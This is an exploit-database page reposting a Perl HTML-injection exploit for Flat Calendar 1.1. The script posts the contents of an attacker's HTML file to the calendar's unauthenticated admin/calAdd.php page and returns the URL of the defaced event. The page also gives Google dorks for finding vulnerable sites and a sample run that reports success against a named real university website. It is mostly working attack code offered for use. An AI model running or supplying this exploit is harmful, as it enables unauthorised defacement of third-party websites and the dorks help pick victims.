Flat Calendar 1.1 HTML Injection

2014.12.09
Credit: ZoRLu
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl -w #Title : Flat Calendar v1.1 HTML Injection Exploit #Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip #Author : ZoRLu / zorlu@milw00rm.com #Website : http://milw00rm.com / its online #Twitter : https://twitter.com/milw00rm or @milw00rm #Test : Windows7 Ultimate #Date : 08/12/2014 #Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others #BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) #Dork1 : intext:"Flat Calendar is powered by Flat File DB" #Dork2 : inurl:"viewEvent.php?eventNumber=" # #C:\Users\admin\Desktop>perl flat.pl # #Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname #Exam1: perl flat.pl http://localhost / index.html ZoRLu #Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu # #C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu # #[+] Target: http://jcbc.jesus.cam.ac.uk #[+] Path: /member_content/diaries/womens/calendar/ #[+] index: index.html #[+] Nick: ZoRLu #[+] Exploit Succes #[+] Searching url... #[+] YourEventNumber = 709 #[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709 use HTTP::Request::Common qw( POST ); use LWP::UserAgent; use IO::Socket; use strict; use warnings; sub hlp() { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\nUsage: perl $0 http://target.com /calender_path/ indexfile nickname\n"; print "Exam1: perl $0 http://localhost / index.html ZoRLu\n"; print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu\n"; } if(@ARGV != 4) { hlp(); exit(); } my $ua = LWP::UserAgent->new; my $url = $ARGV[0]; my $path = $ARGV[1]; my $index = $ARGV[2]; my $nick = $ARGV[3]; my $vuln = $url . $path . "admin/calAdd.php"; print "\n[+] Target: ".$url."\n"; print "[+] Path: ".$path."\n"; print "[+] index: ".$index."\n"; print "[+] Nick: ".$nick."\n"; my @months = qw(January February March April May June July August September October November December); my ($day, $month, $yearset) = (localtime)[3,4,5]; my $year = 1900 + $yearset; my $moon = $months[$month]; if (open(my $fh, $index)) { while (my $row = <$fh>) { chomp $row; my $req = POST $vuln, [ event => 'Test Page', description => $row, month => $moon, day => $day, year => $year, submitted => $nick, ]; my $resp = $ua->request($req); if ($resp->is_success) { my $message = $resp->decoded_content; my $regex = "Record Added: taking you back"; if ($message =~ /$regex/) { print "[+] Exploit Succes\n"; my $newua = LWP::UserAgent->new( ); my $newurl = $url . $path . "calendar.php"; my $newreq = $newua->get($newurl); if ($newreq->is_success) { my $newmessage = $newreq->decoded_content; my $first = rindex($newmessage,"viewEvent.php?eventNumber="); print "[+] Searching url...\n"; my $request = substr($newmessage, $first+26, 4); print "[+] YourEventNumber = $request\n"; sleep(1); print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n"; } else { print "[-] HTTP POST error code: ", $newreq->code, "\n"; print "[-] HTTP POST error message: ", $newreq->message, "\n"; } } else { print "[-] Exploit Failed"; } } else { print "[-] HTTP POST error code: ", $resp->code, "\n"; print "[-] HTTP POST error message: ", $resp->message, "\n"; } } } else { sleep(1); die ("[-] NotFound: $index\n"); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top